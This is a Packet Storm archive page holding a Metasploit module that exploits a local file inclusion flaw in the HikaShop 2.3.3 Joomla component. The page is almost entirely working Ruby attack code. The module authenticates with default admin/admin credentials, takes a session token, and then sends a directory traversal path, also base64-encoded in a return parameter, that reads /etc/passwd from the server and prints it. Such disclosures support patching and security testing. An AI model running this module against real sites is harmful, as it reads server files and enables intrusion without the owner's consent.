what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

HikaShop 2.3.3 Local File Inclusion

HikaShop 2.3.3 Local File Inclusion
Posted Jan 5, 2015
Authored by HauntIT

This Metasploit module exploits a local file inclusion vulnerability in HikaShop version 2.3.3.

tags | exploit, local, file inclusion
SHA-256 | 330887e904358c968e0c5a9618e1a6ad9b321fb038a0dd04d60338680d8879b0

HikaShop 2.3.3 Local File Inclusion

Change Mirror Download
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit4 < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient

def initialize(info = {})
super(update_info(info,
'Name' => 'HikaShop - LFI poc for authenticated users',
'Description' => %q{
HikaShop 2.3.3 is vulnerable to local file include attack.
Authenticated user can read local files from the server.

Vulnerability was described on https://twitter.com/HauntITBlog
},
'Author' =>
[
'HauntIT Blog', # Discovery / msf module
'https://hauntit.blogspot.com'
],
'License' => MSF_LICENSE,
'Privileged' => false,
'Platform' => ['php'],
'Arch' => ARCH_PHP,
'Targets' =>
[
[ 'Automatic', { } ],
],
'DefaultTarget' => 0,
'DisclosureDate' => '03.01.2015'))
register_options(
[
OptString.new('TARGETURI', [ true, "Base Joomla directory path", 'joomla']),
OptString.new('USERNAME', [ true, "Username to authenticate with", 'admin']),
OptString.new('PASSWORD', [ false, "Password to authenticate with", 'admin']),
OptRegexp.new('FAILPATTERN', [ false, 'Pattern returned in response if login failed', '/error/'] ),
], self.class)
end

def check
end

def fetchMd5(my_string)
if my_string =~ /([0-9a-fA-F]{32})/
return $1
end
return nil
end


def exploit
# 1st, we will get cookies and token
req1 = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path,'administrator','index.php')
})
cookies = req1['set-cookie']
if not req1
fail_with("[-] Failed with 1st request")
end

print_status("[+] Resp code: " + req1.code.to_s)
print_good("[+] Cookie(s) : " + cookies)

token_pattern = /(<input type=\"hidden\" name=\"[a-zA-Z0-9]*\" value=\"1\")/
if req1.body =~ token_pattern
token = fetchMd5(req1.body)
print_good("[+] Token : "+ token.to_s)
else
print_status("[-] Token not found")
end


# now we need to do auth using that token and cookies
print_status("[+] 2nd request (post with auth)")

auth = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path,'administrator','index.php'),
'cookie' => cookies,
'vars_post' => {
'username' => datastore['USERNAME'],
'passwd' => datastore['PASSWORD'],
'option' => 'com_login',
'task' => 'login',
'return' => 'aW5kZXgucGhwP29wdGlvbj1jb21faGlrYXNob3AmY3RybD12aWV3JnRhc2s9ZWRpdCZpZD0wfGJlZXozfGNvbXBvbmVudHxjb21faGlrYXNob3B8YWRkcmVzc3wuLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi9ldGMvcGFzc3dk',
token.to_s => 1
}
})

print_good("[+] Code after auth: " + auth.code.to_s)


# 3rd step: get + post params to lfi
print_status('[+] and now 3rd request...')
xpl = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path,'administrator','index.php'),
'vars_get' => {
'option' => 'com_hikashop',
'ctrl' => 'view',
'task' => 'edit',
'id' => '0|beez3|component|com_hikashop|address|../../../../../../../../../../../../../../../../../../etc/passwd'
},
'cookie' => cookies
})

if xpl
print_good("[+] 3rd response code: " + xpl.code.to_s)
print_good("[+] 3rd (full) response body:")
print_status(xpl.body)
else
fail_with("[-] Cannot exploit it :C")
end
end # exploit

end
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    6 Files
  • 22
    Nov 22nd
    48 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    60 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close